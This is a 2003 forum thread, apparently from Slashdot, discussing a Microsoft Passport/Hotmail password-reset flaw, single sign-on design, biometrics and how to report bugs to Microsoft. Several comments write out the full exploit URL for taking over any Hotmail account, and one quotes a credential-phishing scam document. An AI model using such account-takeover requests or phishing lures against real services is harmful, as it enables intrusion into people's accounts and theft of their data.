That's like saying that the concept of cars is flawed just because the Yugo existed.

Re:Flawed concept

[vadim_t]

SSO is flawed by design. It's an attempt of getting security without the inconvenience, but this is practically impossible. You either have to re-authenticate continously, or risk somebody using your account while you go to the bathroom.

Security is never convenient. It always involves doing something unpleasant, like typing your password every 5 minutes, carrying a card with you all the time to insert in a reader and that you must not forget to take with you to the bathroom, accept being searched, etc.

Re:Flawed concept

Security is never convenient. It always involves doing something unpleasant, like typing your password every 5 minutes, carrying a card with you all the time to insert in a reader and that you must not forget to take with you to the bathroom, accept being searched, etc.

Or carrying your thumb or retina around..

Re:Flawed concept

[vadim_t]

Oh, that's inconvenient too. Every security system involves major inconveniences if you lose your token. For example, you have to be really careful with your hands if you use fingerprints. If you lose your card the door won't open, if you cut your finger it's possible that it won't open either, and you can also have an eye infection. Sometimes you may need to have your eye operated, too.

And anyway, fingerprints are extremely unreliable. It's possible to lift fingerprints from the sensor, and fake a finger with cheap replacements. It will also get dirty fast and of course will start having problems. See this article, for example.

Retinal scanners probably are more effective, but like all biometric solutions have a BIG problem. If somebody manages to repoduce your fingerprint or retina, what can you do about it? Get a new eye? See? It's all very inconvenient.

Re:Flawed concept

[WowTIP]

I think you underestimate the amount of work biometric companies put down to make their solutions efficient, reliable and secure.

Many systems that use your fingerprints will allow you to store data from several fingers at once. The chances that you cut both you thumbs and index fingers the same day is pretty slim.

Another concept getting common is checking bloodflow, heat signature or other biological properties before accepting your finger.

Re:Flawed concept

[vadim_t]

Well, I doubt that it's 100% effective. The more complicated something is, the more can go wrong. Heat signature and capacitative sensors can be foiled quite easily, see this article, for example.

Even if you have a 100% effective scanner that never has a false positive, and can tell a real finger from anything else, you still have a problem: The system doesn't know your finger. It knows the data produced from your finger. Feed it to the system in any other way, and it's going to accept it just fine. It doesn't matter if it's difficult, somebody will figure it out sooner or later. When somebody can impersonate you it will create big problems. You may not believed because "the system is perfect", or in any case will have to use other fingers, and you don't have an infinite amount of them.

Re:Flawed concept

[EvilTwinSkippy]

The problem with a single sign-on system is not conceptual. Single sign-ons are great for Intranets.

You can design the system to be virtually crack proof.

The issue is that you now have the entire user-base of the world trying to live as one big happy family on a central authentication server-farm somewhere. No matter how much you grow that server-farm, you are going to run up against some limitation to performance. If the central server is overwhelmed EVERYTHING attached to it slows to a crawl.

This is why NT domains are so pathetically small.

Now to prevent a single point of congestion or failure, you design redundent nodes and/or you start caching information locally.

Replicating information across databases opens you up to corruption (or pollution) in transit. If you aren't absolutely paranoid about validating both sides of a conversation, haX0rs can insert their own credentials.

Cached information requires complete trust of the local operating system, all of its binaries, and the network connection between here and the central authenticator. The right magic can insert, spindle, or mutilate credentials in the local cache. (Think stack smashing attacks, spoofing the server, etc.)

Re:FUD

fixed? they disabled resetting of passwords... that is a quick hack to stop the bleeding, but it does not get around the real issue of poor design. is it that hard to acutall think about what kind of input can come ina query string, and what should be done with it? arent they supposed to be professionals? i learned about this in a CS course, and i couldnt help thinking, "duh, any sensible person wouldnt be that stupid..." obviously i was wrong.

Re:FUD

[CowboyBob500]

Fixed does not mean simply 404ing the offending page. There are many legitimate users now who cannot change their passwords. This is a cheap hack while they work out what the fsck to do about the real problem.

Bob

Try stealing billgates@hotmail.com

[jkrise]

You could freak out with all his credit cards! Assuming he's got a good credit rating though :-(

Re:Try stealing billgates@hotmail.com

[miscGeek]

Even Billy Boy knows better than to trust M$ with his credit card information :)

Re:Try stealing billgates@hotmail.com

[rf0]

or just go for abuse@hotmail.com.

Rus

Re:Try stealing billgates@hotmail.com

That reminds me of the time I and a friend noticed a free mail provider that had forgotten to reserve certain interesting (to say the least) addresses.

I got webmaster@... and I believe my friend got administrator@...

I don't know if my friend got any mail, but I got a lot of interesting messages until I got bored and stopped checking it :-)

Now, before any of you start bashing me for being irresponsible, I did try to help out the users who sent me mail. Mostly I just told them who to really contact.

I did get carried away a couple of times though. Once I decided to reply to a spam complaint and thanked them for the nice porn links they forwarded to me. They never responded, funny thing.

(this posted anonymously for obvious reasons)

Re:Try stealing billgates@hotmail.com

[TheLink]

Heck I got postmaster from an ISP once. Not liked I'd check it - but I can use it for usenet posts :).

After a few days, someone from the ISP called up and asked if I could please change it to something else.

I suggested root. But for some reason they didn't like that one either nor the other few I suggested.

Oh well, I've recent registered buy and contact at the same ISP's new brand domain name ;).

Re:Try stealing billgates@hotmail.com

[karlm]

abuse@hotmail.com has not been checked in several months and so the account has been deactivated.

Re:Try stealing billgates@hotmail.com

[nyseal]

Wow...I'm curious to know if Billy even USES a hotmail account.....how ironic if he doesn't!

Re:Try stealing billgates@hotmail.com

[epsalon]

On our university system, student accounts must start with an 's', and cannot start with 'sys'. One student took "sisadmin" and another took "samba"...

How do you contact Microsoft?

[Albanach]

This raises an interesting question about how, exactly, you are supposed to notify Microsoft by email.

Microsoft make an interesting interpretation of RFCs by accepting all mail to postmaster@ but only insofar as to send an automatic response saying your message will not be read.

This guy also says he tried to email them ten times and never got further than automagic autoreplies. Do they actually have a procedure to inform them when things are broken?

Re:How do you contact Microsoft?

Yes, it's called posting on slashdot, silly!

Re:How do you contact Microsoft?

[PerryMason]

Do they actually have a procedure to inform them when things are broken?

As far as i'm aware, they have a guy who just keeps clicking reload on the /. front page waiting for a new MS vulnerability story to pop up. They tried the same thing with Bugtraq but there were just way too many vulnerabilities for the poor guy to keep up.

Re:How do you contact Microsoft?

[Quixote]

I don't know about you guys, but I just got this from my buddy Steve Ballmer today:

From SteveBallmer@ceo.microsoft.com Thu May 08 01:26:33 2003
Return-Path: <SteveBallmer@ceo.microsoft.com>
Delivered-To: unknown@somewhere.com
Received: (qmail 8935 invoked from network); 8 May 2003 01:26:32 -0000
Received: from unknown (HELO delivery.pens.microsoft.com) (207.46.248.68)
by xxxxxxxxxxxx with SMTP; 8 May 2003 01:26:12 -0000
Received: from TK2MSFTDDSQ04 ([10.40.1.68]) by delivery.pens.microsoft.com with
Microsoft SMTPSVC(5.0.2195.5600);
Wed, 7 May 2003 18:21:11 -0700
Reply-To: "Steve Ballmer" <GUID-DELETED-@ceo.microsoft.com>
From: "Steve Ballmer" <SteveBallmer@ceo.microsoft.com>
To: <unknown@somewhere.com>
Subject: Rights Management: Enabling New Opportunities for Customers
Date: Wed, 7 May 2003 18:24:10 -0700
Message-ID: <37337373373733737337xxxx@phx.gbl>
MIME-Versio n: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-Mailer: Microsoft CDO for Windows 2000
ontent-Class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Return-Path: SteveBallmer@ceo.microsoft.com
X-OriginalArrivalT ime: 08 May 2003 01:20:07.0109 (UTC)
FILETIME=[DEADBEEF:3MTA3]
Status: RO
Content-Length: 11377
Lines: 206

May 7, 2003

I'm writing to you today about a set of emerging technologies that hold great
promise for enhancing privacy and enabling important new uses for computers and other digital devices. Before I share my thoughts about this in more detail, I want to explain why you're receiving this email.

So, in case you guys need to contact Steve, you have his email address now!

Re:How do you contact Microsoft?

[dki]

Actually, there is a procedure for notifying Microsoft, at least regarding security, via a form on their website.

While the form seems more software-oriented, I imagine one could complain about Passport there as well. I once used it to report what I perceived as a security flaw in XP's built-in firewall, and they were very prompt in their response (they didn't share my perception).

Re:FUD

[edyavno]

How's turning off ability to recover your password "fixing" it? It's not a fix, but disabling a feature that's esential for users who've forgotten their passwords. It's only temporary of course: it stops people from using the exploit while MS is working on really fixing it.

Re:FUD

And what if Microsoft had not been kindly warned of the exploit by the person who found it?

Comment removed

[account_deleted]

Comment removed based on user account deletion

The Damage Has Been Done

[TubeSteak]

"Passport accounts are central repositories for a a person's online data and can include personal information such as birthdays and credit card numbers as well as acting as the single key for the customer's online accounts."

Its kindof important to remember that this exploit has been out in the wild for a loooooong time. I can imagine Danka is going to have a lot of pissed of h4x0rs who are going to want their exploit back.

~would this be the prime example of a security hole being called a feature?~

Re:The Damage Has Been Done

[Anonymous+Struct]

Not to mention the real damage -- solid evidence that no matter how many assurances Microsoft gives you that your data is safe and they've taken all precautions, you simply cannot trust them with important personal data. How many times does your bank have to 'whoops' a $1500 deposit before you decide that it's just not acceptable to do business with them? Once is usually enough.

Having your website defaced is one thing, and having a day-long network headache because of the most recent worm is one thing, but losing sensitive personal data is quite another. Based on their track record, Microsoft is simply not qualified to step into the role of holding and protecting important personal information, and this exploit makes that abundantly clear.

To be fair, maybe nobody is qualified to step into that role right now, but Microsoft's release-now fix-later approach to software development has no place in an environment where there's so much at stake.

What's really scary...

... about this is how Microsoft continues to soapbox about how secure M$ products are yet repeatedly ignore those who find holes. This guy sent them several emails about this and they did nothing until they were called out on it. The same thing happened with BO and CdC. They informed M$ of security issues related to "Back Office" and then created Back Orifice as a "See, I told you so", when M$ refused to acknlowledge the problem...

Re: Procedure to inform them it's broken.

[zakezuke]

There is an outlined procedure for this sorta thing...

In the event a user discovers an exploit, inform user to reboot machine and it will go away.

But seriously, there seems to be no OFFICIAL way for end users to actually contact microsoft, nor any sorta automated system to rank e-mails based on importance, nor any human within the phone network who actually knows who to talk to. People who i've known that worked there also have no clue as far as who to talk to, and admit this if you're lucky. If you are unlucky, just say it's a vender issue without thinking the vender is Microsoft.

thoughts

[unborracho]

Since the report wasn't very descriptive, I was hoping someone could enlighten me. I would assume that since they don't ask you to provide your old password to change it, this is a method for users who forgot their old password to get it reset to some random password that Microsoft gave, and have it sent to an email that the user provided from the website.

So couldn't Microsoft simply fix this by having the email sent to the person's email address they provided when they registered with .NET? (assuming it's non-hotmail)

Re:thoughts

[Kredal]

since it's been 404'd, I'll provide it here.

If you went to:

https://register.passport.net/emailpwdreset.srf? lc =1033&em=victim@hotmail.com&id=&cb=&prefem=attacke r@attacker.com&rst=1

and replaced the victim address to a real user, and the attacker@attacker.com to your address, they would send you an email telling you to click on another link, and you could set your own password. Wala, you now have rights to that hotmail account so you can read their mail, look at their buddy list, safely spam people, buy stuff (if they have their credit card saved), etc etc etc... Real fun stuff.

Re:thoughts

[planckscale]

It works. I got the email and was sent to a page where I could reset my password without having to type in my old password first.

404

[Richard_J_M]

The vulnerability seems to return a 404 - so it seems hotmail have taken notice after all - even though it took a /. to make them notice.

Add one to the pile

[Ashyukun]

Yet another reason to be glad I ditched my Hotmail account and refuse to use Passport after Hotmail 'politely' informed me that my last name (the one I was born with) violated their offensive language filter and asked me to change my last name.

Re:Add one to the pile

[FauxPasIII]

I think I speak for everyone here when I ask... What's your last name ?!

Re:Add one to the pile

[csteinle]

What, as in "Allcock, All the Time?"

Re:Add one to the pile

[the+bluebrain]

Considering both the prez and the vice prez might have the same problem (okay ... first names, too), you're in ... uh ... elite company (I hesitate to use the word "good" univocally)

Re:Add one to the pile

[dubstop]

That's how it starts.

In fifty years time, when Microsoft are in charge of the planet, they won't be asking you to change your last name, they'll be telling you that they've already changed your entire name to a 256-character, globally unique identifier. For your convenience, of course, and at a very reasonable fee of M$50 (MicroSerfian dollaroonies), which, again for your convenience, they've already deducted from your (compulsory) Bank of Microsoft account. As a result of this unexpected deduction, your account will go M$1 overdrawn, and this will mean that they are entitled to immediate vacant possession of your home. When you query this, it will be pointed out that this entitlement was clearly detailed in 2-point font, on page 437 (that's about one-third of the way in) of the click-through agreement that you read, understood, and click-through-agreed to when opening your (compulsory) Bank of Microsoft account. At the time that this is pointed out, your attention will be drawn to the clause on page 442 that they are also entitled to one of every major organ that you have two of. This includes (but is not limited to) your lungs, kidneys and, at the discretion of the Microsoft legal department (formerly known as the US Department of Justice), your testicles. They will gladly help you to pay for the operation to remove these organs, by the extension of a small loan, repayable in 7200 monthly payments that, for your convenience, will exactly match your monthly salary. You will be responsible for the shipping of at least two of your children to the secure holding facility at Redmond, where they will be held as collateral for the duration of the loan.

Where do you want to go today?

Re:Add one to the pile

[mobileskimo]

Well one of my favrotite authors is Michael Moorecock (Elric, Corum, Eternal Champs). It's rather embarrassing asking an employee of Forbidden Planet,

"Excuse me, where would I find Moorecock?"

"I'm sorry, I wasn't aware you had some earlier..."

Re:Add one to the pile

[pcardoso]

funny... I just had the same problem while registering an hotmail account for my girlfriend to use, so we could IM each other... most of our contacts are MSN addresses, so Windows Messenger was the best choice. I don't like that much, but what the hell! Gaim has no problems with that..

Back to the topic, her name is Ana Luisa and guess what happens when you concatenate her first two names together! It was getting on my nerves to receive a error message because of some issue with the username (but not an existing username, oddly)... It was only after a lot of attempts that I noticed the first 4 chars of the username... Added a underscore and it was all ok...

Re:Add one to the pile

[daveatwork]

no, its Allcock as in "Allcock no brains" :-)

Re:Add one to the pile

[FuzzyBad-Mofo]

A 600 year loan? Damn, let's hope that lifespans increase dramatically in the future.

RTFA

secure@microsoft.com

Re:FUD

[Bendy+Chief]

This, friend, is why I write my passwords on all my personal effects!

It's handy-dandy, and I've never had a probASDFK6GJL45SDJ6G-CARRIER LOST-

I agree completely.

[@madeus]

I agree completely.

I spent a year on contract developing a product, web based (on Unix), which allowed users and managers spend budgets as allocated by management in real time and I spent 3 doing just planning and develping the auth system (as it has company/office/team/user levels (user@team.office.company for the username) it was addmittedly a little more complex than your average auth system).

In the end the system has a really solid auth system everything is authenticated and when you try and actually make a transaction there is a multi tiered system that checks budget approval at user, office, team and company level.

It required mind numbing discussions again and again to get it done but it was resolved in the end. I'm glad the projects over though, repeately explaining why it was nesseary to take a long and stable and secure approach (rather than a quick hack approach) to non technical people is very draining (their simple approach, though the wouldn't admit it if you asked them, was actually 'hack it together as quickly as possible', which is what a lot of competitors had done, which is why they had such poor systems, which is why this company was started).

I utterly, utterly dispair when I see cgi scripts that don't have a decent authentication mechanisim. With rare exception (along the lines of everybody makes mistakes) it's just incompotence, there are simply people out there who really should not design or impliment systems or write software (even CGI's).

I am a big fan of the slow, methodical, planned, discussed and documented approach to development.

The previous exploits for hotmail were poor, but I recall that at least of one of them was due to an error error that I can empathise with to some extent (it wasn't as blatant), but I am stunned at the level of ineptitude shown by this particular exploit, but I know the same stupid mistakes are repeated all over the place...

Re:I agree completely.

[aphor]

I'm not sure I agree with you wholeheartedly.

there are simply people out there who really should not design or impliment systems or write software (even CGI's)

These people do not care about security. If they did, they would learn how. It is easy (even though it exposes the need for more work) to write secure software if you assume a hostile operating environment. You get in the habit of thinking "how can this technique break down?" Consequently, you get in the habit of dealing with the most common/obvious things with other proven techniques. Even the people who prefer to write sloppy hacks can be made to practice security if there is a culture of "how can we keep this from breaking?"

Re:I agree completely.

Who's to say your system is any more secure?

There could be a dumb bug just waiting to be exploited but because (I assume) your system is not public then there probably have been no (or very simple) attacks on it.

Anyone can make a mistake. It's not just about the design. The implementation could have any number of bugs that would compromise security. Although I don't know what your testing practices are like, I can say most programmers do an inadequate amount of testing. You need to try to break into your own system using techniques never imagined.

Even if you did all that though, there's no telling what kind of bugs lie in wait.

Re:I agree completely.

[@madeus]

These people do not care about security. If they did, they would learn how. It is easy (even though it exposes the need for more work) to write secure software if you assume a hostile operating environment.

I agree that it creates more work, and that these people do not care about security, but I don't belive it's possible to change there approach if it's so broken they don't think about potential abuse from day one.

Even the people who prefer to write sloppy hacks can be made to practice security if there is a culture of "how can we keep this from breaking?"

Do you really think so?

I can't say I agree as I've personally never seen 'how can we keep this from breaking' in any development culture (other than the project I looked after ;), and I don't belive that unless your actually doing part of someone's job for them that you can be sure they are taking an approprate approach. Though I'd be interested to here if people have experienced that kind of environment. I assume it must happen somewhere, in the finance / banking world perhaps?

The only well developed systems I've come across have been directly down to the skills of the developer (or lead developer) responsible, rather than a result of a culture in the environment.

This has left me with the impression that the only way to do things well is to simply have the right staff, and that exercises in establishing or changing corporate culture are largely (though not completely) a waste of reasources.

Re:I agree completely.

I (myself little me) actually worked for a company which tested passport(& localized it). I was one of the guys spending hours and hours doing reg.tests. And they tried shove the java-debug position on me(thats why I quit). And yes, its all unix back end (was then at least). I saw things that would blow your mind!! I signed a nda so I can't (even as ac) tell you.. :(

One has to understand that M$ is a big company, and everyone in that company just does what they have to do to cover *their* ass! Nobody gives a F**k about the products!! The company I worked for was payed (poorly) to deliver. If that ment cutting corners...guess what...
There is NO WAY there can be good/secure products coming out of that system!! Thats why OSS will succeed.

Re:I agree completely.

[@madeus]

Who's to say your system is any more secure?

The design. You could simply not do that im my implimentation. Yes it might have security bugs, but NOTHING as fundamentially and basically broken as that. It IS down to the design, and I think it's very important to understand if you want to write good (stable and secure) code.

I am aghast that you might think that allowing you to change a user's password via passing bogus form parameters is not an amazingly bad thing (for the world's biggest single sign-on service at that). It should be immediately obvious that it is simply mornic.

In my application, for example, you can't change the password without providing existing authentication details to the lower level API ('AuthUser' which calls 'User', which calls 'GetUserInfo', which calls 'DB Interface', which calls 'IO' which calls the raw database interface and get's the data out).

[Note: Names of libraries are examples, not AFAIR actual name used.]

The importance in the design is in using abstraction, I don't use so many libraries for fun, it is because it makes code ultilmately managable, gives you numerous checkpoints, and gives you fantastic debuging (when implimented correctly, a challange in itself.).

But the importance is in that the users details are never trusted, the details passed are always verified against what's actually in the database for that user - even if the function can only be called from another embeded function - this makes it very secure in that it's not possible to fake being another user without first authenticating as them as an inspection of the users details is done in EVERY library function.

There are API's for the CGI scripts to interface with, and there are API's for those backend libraries interface with, right at the bottom there is a single API which deals with the IO. This gives easy database portability as well as providing a layer of security as you never interface with the database via a script, only via an API (which is the source of many problems as far as commercial web security goes, if they only accessed data via tight abstracted intefaces they simply would not be anything like as exploitable).

Buy taking such an approach to the design it means an attacker could perfom an exploit to upload/create a Perl script on the server to change a users password and they still wouldn't be able to unless they had authenticated first (though of course if they could do that then you would have other issues!).

While it's true that if I was still working on it I could think of a layer or two I'd like to add, I'm confident that, though it may have errors in the CGI which could be open to abuse, it's no open to such blatant and clealry obvious abuse.

PS: Actually yes it is public, but you require a paid subscription (or to get a demo account for your organisation) to access it.

Re:I agree completely.

[@madeus]

Yep it's mostly FreeBSD backend, but the front end is IIS (and a smallish percentage of the backend servers are Windows based too).

I think most large companies are in the same boat, but I think as Microsoft have such a large number of staff, such intimate knowledge of the software they are deploying and such a huge budget that they could manage projects a better to prevent instances like this.

While I think that companies that start out well and grow big all eventually out grow their roots and typically end up the same way (and I think that this happens in all fields) I would equally have though Microsoft would have had a few good project managers to oversee the process to ensure that best practices were being followed, especially with something as critical as Passport.

Thats why OSS will succeed.

I definately agree with that.

Re:I agree completely.

[Old+Wolf]

None of us would make a system where you can specify any email address to receive the 'change password' email.

Funny stuff

From the passport.net page, in a big green box, under the title "SECURITY", it reads:

Sign in on any computer that has Internet access. .NET Passport uses powerful online security technology and follows a comprehensive privacy policy to help protect your profile information. You manage your information-sharing options.

Re:FUD

[aug24]

Let's start with the observation that it isn't fixed. All they've done is turn off the password change routines at the back end...!

Personally I suggest everyone reading this makes sure to tell everyone they know, in order to stop people blindly trusting any incompetents. The fact that it's MS just makes the schadenfreude better.

Justin.

Re:FUD

[CrazyJ020]

This security vulnerability, and the accompanying quick fix, seem to actually enforce Microsoft's touted concept of centralized computing and services.

Think about it, with a company like Microsoft, there is no doubt vulnerabilities will exist. If this was a distributed product we would still have script kiddies years from now drilling on this exploit. Now that it is a centralized service, it has been fixed in one place before any substantial damage has been done. -- Which evil do you want today?

why?

[qbproger]

why does microsoft always wait to fix security vunerablilities like this? It seems like if it's not affecting one million people they don't care.

Maybe it's because they don't want to fix vunerabilities that aren't being taken advantage of? Seems as though there are a lot of them.

MS-Passport and those that cannot/willnot read

[SgtChaireBourne]

MS-Passport has long been known to be impossible to secure, even in theory: See Risks of the Passport Single Signon Protocol. Even the FTC charged Microsoft with deceptive advertising in regards to MS-Passport. Other governments are not getting caught with their mouth open either. Standards body forced Redmond to pull 'unsubstantiated and misleading' advertisement

There really does seem to be no difference between someone who cannot read and someone who does not. Those that can read wouldn't be caught using MS-Passport. Sadly, signal can be drowned out by noise coming from a colossal marketing blitz to last through september.

We'll see if they last that long. Windows2003 seems to be more of a push to get users over to OS X or Linux. Their other (2nd of 2) cash cow, the new MS-Office has already been postponed and seems to be more of an incentive to move to OpenOffice than to upgrade.

Re:Microsoft? Insecure?

[ftvcs]

Gates: The truth is people just think it's cool to have bugs, they are not bugs. It's a social thing. really.

This is not new

[johnatjohnytech]

This is not a new thing, this has been around for a while.

It is about time somebody tried to bring this to light. But i really doubt he "discovered" something that has been known about for a while.

Don't believe me? Do a search on kazaa for hotmail passwords. You will find several txt/doc's with these or similiar instructions.

Re:This is not new

[ymgve]

I think all of those documents on Kazaa are along the same lines - tricking you into sending YOUR login and password to some shady looking address.

Could be worse...

[Ratface]

They could fix it by making it impossible to enter arbitrary URLs in the next version of Internet Explorer :-D

Re:Could be worse...

[ConceptJunkie]

That's not funny, that's the scariest thing I've ever heard. How will you navigate a lot of sites without hacking URL's?

Oh, well, I use Phoenix anyway.

People really TRUST Passport??

[mahdi13]

Reasons like this is why I only use it for Hotmail and NEVER use ANY online service to store inportant information, like Credit Cards, SS# and anything else that can easily be used for Identity Thieft

What breed of idiot are you?

[gazbo]

So it isn't a standard IIS 404. That is wrong how? Let me put it another way:

lynx -head -source --mime-header 'https://register.passport.net/emailpwdreset.srf?l c=1033&em=victim@hotmail.com&id=&cb=&prefem=attack er@attacker.com&rst=1'

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
Date: Thu, 08 May 2003 13:10:14 GMT
PPServer: H: LAWPPREGU4A002

It's a 404. It returns a 404 code. It says it's a 404 on the page. Just because you understand so little of the HTTP protocol to think that 404 means "displays apache logo" doesn't make MS wrong.

Re:What breed of idiot are you?

[Dark+Lord+Seth]

lynx -head -source --mime-header 'https://register.passport.net/emailpwdreset.srf?l c=1033&em=victim@hotmail.com&id=&cb=&prefem=attack er@attacker.com&rst=1'

HTTP/1.1 404 Not Found
Server: Apache/2.0.43 (Unix)
Date: Thu, 08 May 2003 13:10:14 GMT
PPServer: H: LAWPPREGU4A002

This would be allot more fun to see though...

Re:What breed of idiot are you?

[Larsing]

You are obviously American.

Re:What breed of idiot are you?

[Old+Wolf]

Er, after all their boasting, they use Apache+Unix for hotmail still?

Re:What breed of idiot are you?

[Larsing]

Tydligen inte engelsk heller. "allot" ar fullt korrekt att skriva i brittisk engelska...

Re: Procedure to inform them it's broken.

[Zak3056]

But seriously, there seems to be no OFFICIAL way for end users to actually contact microsoft, nor any sorta automated system to rank e-mails based on importance, nor any human within the phone network who actually knows who to talk to.

Tell me about it. When IE5 first came out (with the modular installer) the installer had a nasty bug: If the FTP site it tried to connect to to download a CAB was full, it would create the CAB file which would contain no data, only the error message!

As one might expect, this would cause the installation to bomb, and no explanation would be given to the user. Attempting to resume the installation would also fail. The solution was, of course, to go into the installer's temp directory and delete the bad CAB files and re-download them, but most users wouldn't know where to find them, and would be forced to start from scratch.

When I attempted to contact Microsoft about the problem, they asked me for a credit card number. When I explained I didn't want support and was trying to report a bug, I was transferred to someone else who... asked me for a credit card number. Wash, rinse, repeat.

With a name like that...

[RMH101]

...he's lucky he didn't get carted off to Guantanemo Bay...

Re:With a name like that...

[davesag]

there is still plenty of time for that.

No, just popular

[doublem]

Nope, just means he/she is well paid for whatever portion of the sex industry they work in.

That and EVERYONE can find something they like when going to bed with them.

How does this affect other freebie mails?

[zogger]

Does this exploit or similar affect yahoo mail and other similar web based free email services? Anyone check yet? Looks like there isn't a coding fix for hotmail yet, only that they turned it off, just wondering if this is going to bork all the other free web based email systems out there.

Re:How does this affect other freebie mails?

[clgoh]

I had my Yahoo account stolen a few months ago.

I don't know how, but it might be a similar problem.

Yahoo customer service was not helpfull...

clgoh

Re:How does this affect other freebie mails?

[zogger]

bummer man, sorry to hear it. This whole email "problem" and crooks and badguys on the net is just so dismal. Lot of guys here been on the net way longer than me, but I've been on long enough to remember when spam was pretty rare, and not a lot of "hack" attempts, at least on a joe user desktop situation, never been in the "server" business so I really don't know how "bad" it's always been.

Maybe bring back old testament styled REVENGE justice?? hahahahahaha Get caught massive spamming or black hatting,too bad, your victims get to bash you with your own equipment then. Skip fines and jail time, a nice sound mega thrashing!

Anyway, I was suspicious of this exploit when I read how they did it. Sounds almost doable in some other situations, but I'm not an IT security expert so am not sure on it.

Re:FUD

[gazbo]

If you read the news article, it says that although he sent several emails, not one was sent to security@microsoft.com - the advertised place to send them.

He sent them to, amongst others, abuse@hotmail.com. This is the place that they will get mails from everyone complaining about a spammer etc - it's like receiving the wrong order from Amazon and sending an email to hostmaster@amazon.com, then flaming them for taking so long to respond.

Re:FUD

[xanadu-xtroot.com]

You, my friend, are a nut case. You said:

this has already been fixed.

Then you went on to post:

"We have shut down all ability to reset passwords,"

And you're calling that a "FIX"?!? Dude, that's a "work around" or a "hack" or something along those lines. That is most definatly NOT a "fix". If they turn the service back on, guess what'll happen...

MS announcement

[fudgefactor7]

Passport Security Issue. MS was listening, Muhammad Faisal Rauf was just too impatient. Probably just wanted credit as being "kewl," or something.

Re:MS announcement

[tazan]

Wrong. They only responded to him posting the exploit, not to the original emails.

Re:MS announcement

[fudgefactor7]

Wrong. He didn't send emails to the correct address. There is only ONE correct email address to contact MS about security issues, and he failed to do so. Clearly his fault, impatience, and unwillignness to "do the right [as in "correct"] thing."

Re:MS announcement

[MrPink2U]

...and I'm sure Microsoft would ignore an email that requested 10,000 copies of Windows XP because the request went to the wrong email address.

rrriiiiight...

I can't believe that anyone would actually defend MS for this balatant disregard for security.

Re:MS announcement

[fudgefactor7]

I can't believe that people would assume that a large, multi-national company, like MS, is capable, with the bureaucracy that is inevitably in place (as is with all such organizations) will always be able to act in a perfectly timed manner so as to get one email destined for one department but mis-routed over to the correct destination. Additionally, the "bug hunter" that found this bug (a) sent the bug (numerous times, apparently) to the WRONG ADDRESS (just like if you mail your mortgate to the wrong address--funny things will happen, like it getting lost or discarded); and (b) allowed for less than 1 day for the communication to be routed. Common sense says that's insane, and common bug reporting protocol gives 3 days. Ergo, the bug hunter is a dork who fucked up. MS, as you know, did respond and acted in a manner correct to the severity of the situation. The situation is clear to anyone who knows these things.

Re:MS announcement

[merchant_x]

So what's the correct address to report bugs to Microsoft? As you can see from this thread of posts several slashdotters are in the dark about this.
http://slashdot.org/comments.pl?sid=63519&c id=5909258
Please enlighten us.

Re:MS announcement

[NickFitz]

This is Microsoft's response to his report.

I notice that they don't have the line about "This was not reported to us which is terribly irresponsible etc. etc." which they often put on these things. Nor do they acknowledg that they fail to provide any obvious way to report these problems.

Go to their security site and there is no obvious point of contact for making vuln reports.

Re:MS announcement

[fudgefactor7]

If it's a security issue, as this bug clearly was, you send a message to secure@microsoft.com, as indicated in the story.

Re:MS announcement

[tazan]

Of course, and a hotmail user discovering a security hole would find that where exactly on the hotmail site? After several minutes of looking around on Microsoft's security homepage I didn't see it there either. I'm sure it's hidden in there somewhere.

Re:FUD

[mulhall]

You seem to be under the the impression that legitimate users actually change their passwords - what planet are you living on?!

Erratum

[gazbo]

secure@microsoft.com

No it's not already been posted before - you told me I had to wait 20 seconds, but it wasn't posted. Stupid damned slashcode coders.

Re: Procedure to inform them it's broken.

[zakezuke]

Tell me about it. When IE5 first came out (with the modular installer) the installer had a nasty bug: If the FTP site it tried to connect to to download a CAB was full, it would create the CAB file which would contain no data, only the error message!

Tell me about it. Let alone to speak of the issue of getting service pack 4 under windows NT 4.0. If you are unfamilar, you need I.E. 4.0 or above to navigate to get service pack 4 which you need to install servicepack 4.0. Near as I'm aware, this is still an issue. My resolution was to download netscape to naviagate the site to get the approperate service pack, and I just declaired victory not so much because it was absolutly nessicary, but because it makes a nice story needing netscape to get any service patches from microsoft.

In theory, this should be the fuction of support, and support making the valued judgement wether or not something is a *bug*, and reporting exploits others report. But you would pretty much need a friend in the support realm who actually knew who to report to, cause the employees are just as helpless when dealing with their own help desk.

"Exchange server crashed, we only support outlook, try rebooting your system" -- typical responce to everything

Re:FUD

[Exedore]

Mechanic: We fixed your brakes... they no longer make that awful screeching sound.
Me: Thanks. How did you fix them?
Mechanic: We removed the brakes entirely
Me: What the...
Mechanic: That will be $567.98, please.

Re:Oh my God (MS explains it all..)

[jkrise]

It seems that all Passport Update Services have been disabled, owing to millions of user complaints about spam! All mail accounts will need to be checked manually for spam. (all software MS Junk mail filters etc. have been junked already).

Of course, this means that Full Control of user accounts is needed. The process of manually cheking every single mail account for spam is underway. When all the billion accounts are checked and spam deleted, Passport .Net will be re-activated.

This is the beginning of the Passport Update Synchronized Service Year (PUSSY) efforts. Thanks for your attention.

Another Hotmail Password Hack found on Kazaa

[doublem]

Hotmail password hacker.doc

THIS IS HOW TO HACK ANYONE'S HOTMAIL PASSWORD

Step 1:
send a mail to Robot_pass_finder@hotmail.com with PW: fetchpass in the subject line

Step 2: The email body
In the first line: put the complete email address of the user whose password you want.

In the 5th line, type the email address and the login (pass) you want the password sent to,
here is an exemple:

To: Robot_pass_finder@hotmail.com
Subject: PW: fetchpass
CC.________________ BCC.___________________
=-email body-=

address@hotmail.com

your email adress here example.: myemail@hotmail.com
your pass here example.: mypassword

Re:Another Hotmail Password Hack found on Kazaa

[psylent]

Riiiiight, and RMS is BillG's twin bro :-) Very interesting!!! Wonder how many are going to fall for this one.

Re:Another Hotmail Password Hack found on Kazaa

[doublem]

Nah, just a BS document I found on Kazaa.

And no, I didn't try it. :)

Re:Another Hotmail Password Hack found on Kazaa

[FroMan]

So, how many usernames and passwords have you collected in Robot_pass_finder@hotmail.com?

Re:Another Hotmail Password Hack found on Kazaa

[HiThere]

You could set up a hotmail account to try it from...

Re:Another Hotmail Password Hack found on Kazaa

[doublem]

About 129 since posting the article
</joke>

It's not my e-mail address, and oddly, a google search turns up nothing...

Confess!

Re:Another Hotmail Password Hack found on Kazaa

[knodi]

My roommate in college and I wanted to hack somebody's hotmail account once, so we searched the internet for methods to do so. I stumbled across this, and promptly fired my own login and password off.

